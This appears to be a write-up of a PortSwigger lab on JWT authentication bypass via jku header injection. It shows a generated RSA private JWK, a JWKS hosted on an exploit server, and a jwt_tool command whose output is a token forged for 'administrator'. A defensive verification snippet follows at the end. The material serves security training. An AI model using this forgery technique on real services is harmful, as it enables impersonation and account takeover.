Lab 5: JWT authentication bypass via jku header injection

https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection


Last updated 11 months ago


First we generate an RSA key with our Burp extension:

We copy the key's value:

{
    "p": "-2zNrL29VeM4PqJnXu9QEvxq5AYkfZCkPB1IBoh6vVWo0v5xk-oLAsrSa6oT0yfBXa1FLyJC1CqbC8xCaQrY1ei_hAEF2puKdS0MeeU-aruBkYZRZT4iX4-R9XT1FcLJVQqss8d-jwYCJJEntxjMWrktBua0n1YDEtcglaJb0Yk",
    "kty": "RSA",
    "q": "6MucFLHMg1fMOXVT5VE1lpCFYzSyTl99LiaXlZQ3d4GuFrNcryJ4W0F2lWRs26xmGb47r4fQNZjxmLj0GNmPFaMco_Wxv1M97SUKnLPpKGfdBlWn2MS8CaRIPumNFiZEllVOUu7fUmeUcHLho478BBoeC5KDGxMWMi5G4OnkD5M",
    "d": "BOFvj7BABdLLw5vX12KUrA1Bi-ruXhE9aph_9iBjstzQcHUOaRS1-O9_UmS5jdoNrCA3IbP2JZjjzpj-JLaX0uJAaYW35nxUfjAYcWd9jFokihNBrsN8NQz99VSLnvDazEJFOYavCFh0k-MNBd4xIfpjDevKbvvQTfSMF3f2ofjuDQA70RZw_qMy3QcpCYmTlNZAPi5Mth2jbCf_WlOngkrRo2T1weDTguUvDjhugQZsxChQ23vmSqVUN3-AdQnCwbxi1vITb9RoLRHdYa58kFKmd3MhaUSXocT6g8qW3-AmOphg3ub8rCzNn88TAinTO6X8se9N97kDDObQf7hj8Q",
    "e": "AQAB",
    "kid": "9c18e60f-cfa2-4858-8988-0f5f9b93426e",
    "qi": "XDDFqQi2s5ug1VPz-PNkF4u-U7VXwh-yozyl-x7EaSAU-VP3pMMJFIxZ-SHQPa_3sZCN5sMmI-UIPzLp0Yvgi3rJ5p1jSBrSh16zWxecdX-_7Qikm30dorpOVbIiJfgAxzVDIJY9zqJOCZ0v1ilhTt6zm8eihdDtt97pH5AbpyQ",
    "dp": "4tpdCUt5lhEaIoluM55B5Z-S4oMYUaM8THEvF5X1CPhNB3NFD2zQ2ogeK76dfJwWQGuiTNDg84YttwtpsFV1KCyFAJnbqk9FMkyfQSyykKL2WVOUBYF2ijqEO7B3olbKSc0D3oJVkr6dGFlQOEhLul_yXJO0zT9SLqGkaN7BceE",
    "dq": "4Rc-q6PfI4BZL5WKsUh8kEDdOLdTUQRzfZRDLZZKq3rwYXK8Q3sI9POvPXQE7cMcVffiri6b27cuo4TyQLTb7QfyQXbnjx9l2U7fm_U5lKAYzm80BBz11DzMvkgE603FM7b4LKhbtsoAdVofYo52j2DRfE8GBb_Gzm6AiiidI5E",
    "n": "5KKS9kRidf516xFIgURD0j1pERrzjnnGgwEEUsZTq-tgqtF_M5_w7ic03Q7P-s31DbQbbuhd-ZomVWsu-V09NIgDnk7x8oBFQ6FT5l6YlUL0JUrMN9eN6eUaOeqU26wkzSRR8Ppt-yYMI8wyrDsa7imLT2NtYqz560uVI1Ok3D6lzxBslo_m-BRMN5NjHyXMZNVkxRgahAx4UU71pwlHUCvl5A3JVRVHrCknvbYQoLi4fLgihCbCf5dp7r7TPNQ2HP7Ym5LkBormtUbuQgc7FgzxLPanqwkHXsiBux6Qo4X6hCPq8xe362NPCx4uanOJXX1GD9EN26U2u3PL6wRYqw"
}

We create the JWKS:

The body of the exploit must be wrapped in a `keys` array, like this:

{
    "keys": [
{
    "p": "-2zNrL29VeM4PqJnXu9QEvxq5AYkfZCkPB1IBoh6vVWo0v5xk-oLAsrSa6oT0yfBXa1FLyJC1CqbC8xCaQrY1ei_hAEF2puKdS0MeeU-aruBkYZRZT4iX4-R9XT1FcLJVQqss8d-jwYCJJEntxjMWrktBua0n1YDEtcglaJb0Yk",
    "kty": "RSA",
    "q": "6MucFLHMg1fMOXVT5VE1lpCFYzSyTl99LiaXlZQ3d4GuFrNcryJ4W0F2lWRs26xmGb47r4fQNZjxmLj0GNmPFaMco_Wxv1M97SUKnLPpKGfdBlWn2MS8CaRIPumNFiZEllVOUu7fUmeUcHLho478BBoeC5KDGxMWMi5G4OnkD5M",
    "d": "BOFvj7BABdLLw5vX12KUrA1Bi-ruXhE9aph_9iBjstzQcHUOaRS1-O9_UmS5jdoNrCA3IbP2JZjjzpj-JLaX0uJAaYW35nxUfjAYcWd9jFokihNBrsN8NQz99VSLnvDazEJFOYavCFh0k-MNBd4xIfpjDevKbvvQTfSMF3f2ofjuDQA70RZw_qMy3QcpCYmTlNZAPi5Mth2jbCf_WlOngkrRo2T1weDTguUvDjhugQZsxChQ23vmSqVUN3-AdQnCwbxi1vITb9RoLRHdYa58kFKmd3MhaUSXocT6g8qW3-AmOphg3ub8rCzNn88TAinTO6X8se9N97kDDObQf7hj8Q",
    "e": "AQAB",
    "kid": "9c18e60f-cfa2-4858-8988-0f5f9b93426e",
    "qi": "XDDFqQi2s5ug1VPz-PNkF4u-U7VXwh-yozyl-x7EaSAU-VP3pMMJFIxZ-SHQPa_3sZCN5sMmI-UIPzLp0Yvgi3rJ5p1jSBrSh16zWxecdX-_7Qikm30dorpOVbIiJfgAxzVDIJY9zqJOCZ0v1ilhTt6zm8eihdDtt97pH5AbpyQ",
    "dp": "4tpdCUt5lhEaIoluM55B5Z-S4oMYUaM8THEvF5X1CPhNB3NFD2zQ2ogeK76dfJwWQGuiTNDg84YttwtpsFV1KCyFAJnbqk9FMkyfQSyykKL2WVOUBYF2ijqEO7B3olbKSc0D3oJVkr6dGFlQOEhLul_yXJO0zT9SLqGkaN7BceE",
    "dq": "4Rc-q6PfI4BZL5WKsUh8kEDdOLdTUQRzfZRDLZZKq3rwYXK8Q3sI9POvPXQE7cMcVffiri6b27cuo4TyQLTb7QfyQXbnjx9l2U7fm_U5lKAYzm80BBz11DzMvkgE603FM7b4LKhbtsoAdVofYo52j2DRfE8GBb_Gzm6AiiidI5E",
    "n": "5KKS9kRidf516xFIgURD0j1pERrzjnnGgwEEUsZTq-tgqtF_M5_w7ic03Q7P-s31DbQbbuhd-ZomVWsu-V09NIgDnk7x8oBFQ6FT5l6YlUL0JUrMN9eN6eUaOeqU26wkzSRR8Ppt-yYMI8wyrDsa7imLT2NtYqz560uVI1Ok3D6lzxBslo_m-BRMN5NjHyXMZNVkxRgahAx4UU71pwlHUCvl5A3JVRVHrCknvbYQoLi4fLgihCbCf5dp7r7TPNQ2HP7Ym5LkBormtUbuQgc7FgzxLPanqwkHXsiBux6Qo4X6hCPq8xe362NPCx4uanOJXX1GD9EN26U2u3PL6wRYqw"
}
    ]
}

After that, we modify the JWT and sign it:

The final result is the following:

The final JWT looks like this:

Using JWT_TOOL

We run the following command:

┌──(root㉿SPARTAN-SERVER)-[/home/hacker/BURP/jwt_tool]
└─# python3 jwt_tool.py eyJraWQiOiJiNjRhYThjYy01NmY5LTRlNzQtODE2My04ZmMyNTUwM2E1MmUiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNzQ2OTcxMywic3ViIjoid2llbmVyIn0.VxY8S44qihjURqTa00DJbKlmPxktWH8r02CdNjBMHkCQOYRWDq1ydQEZkY82b5h63XFX7RJ8rWHPbDF9MlV84LvIOl-pmiPt-Pd6F73JIuwECjMfQjMDnzpa9Wb0P_KCsFqSRK2VA5U6Yxr7g3fNx4q9tk0EH3rCqro3KTauFHHkXELoB4u6DOU9Ue6YguHygf2xJzPjnXnoqX_lxVF5ToGcSPgPeToJO67ObvBZHTybw886YVb0gxMKjVpQqGpxaAY2sVB7sgFT1GzzaMs7H120SKqcpsTYIkSPVHLKzusbpWW19jRYycQBVOWbfqHBTMapvi9en-FMjK8COGMtgg -X s -ju https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json -T

jwt_tool Version 2.2.7 (@ticarpi)

Original JWT:


====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================

Token header values:
[1] kid = "b64aa8cc-56f9-4e74-8163-8fc25503a52e"
[2] alg = "RS256"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of kid is: b64aa8cc-56f9-4e74-8163-8fc25503a52e
Please enter new value and hit ENTER
> jwt_tool
[1] kid = "jwt_tool"
[2] alg = "RS256"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0

Token payload values:
[1] iss = "portswigger"
[2] exp = 1717469713    ==> TIMESTAMP = 2024-06-03 21:55:13 (UTC)
[3] sub = "wiener"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 3

Current value of sub is: wiener
Please enter new value and hit ENTER
> administrator
[1] iss = "portswigger"
[2] exp = 1717469713    ==> TIMESTAMP = 2024-06-03 21:55:13 (UTC)
[3] sub = "administrator"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
Paste this JWKS into a file at the following location before submitting token request: https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json
(JWKS file used: /root/.jwt_tool/jwttool_custom_jwks.json)
/root/.jwt_tool/jwttool_custom_jwks.json
jwttool_a9bbfc25f396c70765690e2419b03758 - Signed with JWKS at https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json
[+] eyJraWQiOiJqd3RfdG9vbCIsImFsZyI6IlJTMjU2Iiwiamt1IjoiaHR0cHM6Ly9leHBsb2l0LTBhMDQwMDViMDQwOTRmNDM4MGE1NzU3MDAxMzkwMGViLmV4cGxvaXQtc2VydmVyLm5ldC9qd2tzLmpzb24ifQ.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNzQ2OTcxMywic3ViIjoiYWRtaW5pc3RyYXRvciJ9.gi-MLU-HNg0IE5G1txdAoFaBIH5sI8MPnG39RcRp-Oo6w72Akl6e2pEhP-Nt2RsPGf5hsnecEyB1LLpmxXqx1feYh2SZVSBTU1QmgkjfJz95J_sVh9ZNVGqRiHjAvnQLNhBBE4a3F3sZTiUJHvLDPza880FlbCLVHR4f57TAUNzqt1Ed-jXUYANXx4RDqnnkh-g6PIpLQ3ZUsXyLIYwmdAwgGthqFlihMtGxAd0uRpJZScvYtefyzOdmd9K5mzpJgvixOe6WaShdmZ1Dk8olDvrbGpaHiPkvb3zPaMuKLc7V9-F7zbluL7UfbwwzQJjU749tmvdGgOIJPD1y-2pLfQ

After that, the exploit has to be modified:

┌──(root㉿SPARTAN-SERVER)-[/home/hacker/BURP/jwt_tool]
└─# cat /root/.jwt_tool/jwttool_custom_jwks.json
{
    "keys":[
        {
            "kty":"RSA",
            "kid":"jwt_tool",
            "use":"sig",
            "e":"AQAB",
            "n":"pj6JLmRpdPRRPuh7RS2ir3CcDrmwILr4Ffj-AR0VCCN-hbN_R2RquIlVeP7bOTMhSYk2SG0Jvnmjkr0i3sMVMTi64L3vRDEuY3e7O1bRjFrrfKw4hNn5svGf-xN74JnPFJEqvvIEyek-BX5eo7sHlP1maDta3H98RX0BckNxjRS0eXfyxG_q-K75DD6SNX-hxR00Wx60KXkLV5WvCKN-b34uMc_TXN3jBZO2xpQ1l7WlJ1fFis9-miF222oZ9irsf1OY4B66JBi_0QbOv67l_YhM1j_uwgmE4NOIYA2VpiHQjHBinFan8WNjDOXKAoy3_Kf0QtnTjOWUWQ08SkUzWQ"
        }
    ]
}

We modify the exploit:

And done:

The final JWT looked like this:
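The check a verifier needs in order not to fall for this, as an added example that is not part of the original page or of PortSwigger's lab code: an exact-origin jku allowlist (https only), a single-key lookup by kid, and a refusal of JWKS documents that expose private members, as the first JWKS on this page does. The lab origin is a placeholder, the JWKS fetcher is injected so the code runs offline, and the RS256 signature check itself is assumed to be done by the JWT library with the returned key.

```python
import base64
import json
from urllib.parse import urlparse

# Placeholder lab origin (not a value on the page): the only JWKS source allowed.
ALLOWED_JKU_ORIGINS = {"https://YOUR-LAB-ID.web-security-academy.net"}
# Header of the forged token from this page's jwt_tool run (jku = exploit server).
PAGE_FORGED_HEADER = "eyJraWQiOiJqd3RfdG9vbCIsImFsZyI6IlJTMjU2Iiwiamt1IjoiaHR0cHM6Ly9leHBsb2l0LTBhMDQwMDViMDQwOTRmNDM4MGE1NzU3MDAxMzkwMGViLmV4cGxvaXQtc2VydmVyLm5ldC9qd2tzLmpzb24ifQ"
# The public-only JWKS jwt_tool wrote on this page (kid "jwt_tool").
PAGE_JWKS = {"keys": [{"kty": "RSA", "kid": "jwt_tool", "use": "sig", "e": "AQAB",
                       "n": "pj6JLmRpdPRRPuh7RS2ir3CcDrmwILr4Ffj-AR0VCCN-hbN_R2RquIlVeP7bOTMhSYk2SG0Jvnmjkr0i3sMVMTi64L3vRDEuY3e7O1bRjFrrfKw4hNn5svGf-xN74JnPFJEqvvIEyek-BX5eo7sHlP1maDta3H98RX0BckNxjRS0eXfyxG_q-K75DD6SNX-hxR00Wx60KXkLV5WvCKN-b34uMc_TXN3jBZO2xpQ1l7WlJ1fFis9-miF222oZ9irsf1OY4B66JBi_0QbOv67l_YhM1j_uwgmE4NOIYA2VpiHQjHBinFan8WNjDOXKAoy3_Kf0QtnTjOWUWQ08SkUzWQ"}]}

class JwtRejected(Exception):
    pass

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def jku_is_trusted(jku: str, allowed=ALLOWED_JKU_ORIGINS) -> bool:
    """Exact scheme://host[:port] match; prefix/substring checks would pass lookalikes."""
    u = urlparse(jku)
    if u.scheme != "https" or not u.hostname or u.username or u.password:
        return False
    return f"{u.scheme}://{u.netloc}" in allowed

def resolve_verification_key(token: str, fetch_jwks, allowed=ALLOWED_JKU_ORIGINS) -> dict:
    """Return the public JWK allowed to verify `token`, or raise JwtRejected.
    RS256 itself is left to the JWT library; fetch_jwks(url) is injected for offline tests."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    if header.get("alg") != "RS256":
        raise JwtRejected("alg must be RS256")
    jku = header.get("jku")
    if not isinstance(jku, str) or not jku_is_trusted(jku, allowed):
        raise JwtRejected(f"jku not in allowlist: {jku!r}")
    candidates = [k for k in fetch_jwks(jku).get("keys", [])
                  if k.get("kid") == header.get("kid") and k.get("kty") == "RSA"]
    if len(candidates) != 1:
        raise JwtRejected("no unique RSA key for this kid")
    key = candidates[0]
    if key.get("use", "sig") != "sig" or key.get("alg", "RS256") != "RS256":
        raise JwtRejected("key is not an RS256 signing key")
    # A JWKS carrying d/p/q (like the first JWKS on this page) has leaked its
    # private half; do not accept such a key as a trust anchor.
    if any(m in key for m in ("d", "p", "q", "dp", "dq", "qi")):
        raise JwtRejected("JWKS exposes private key material")
    return {"kty": "RSA", "kid": key["kid"], "n": key["n"], "e": key["e"]}
```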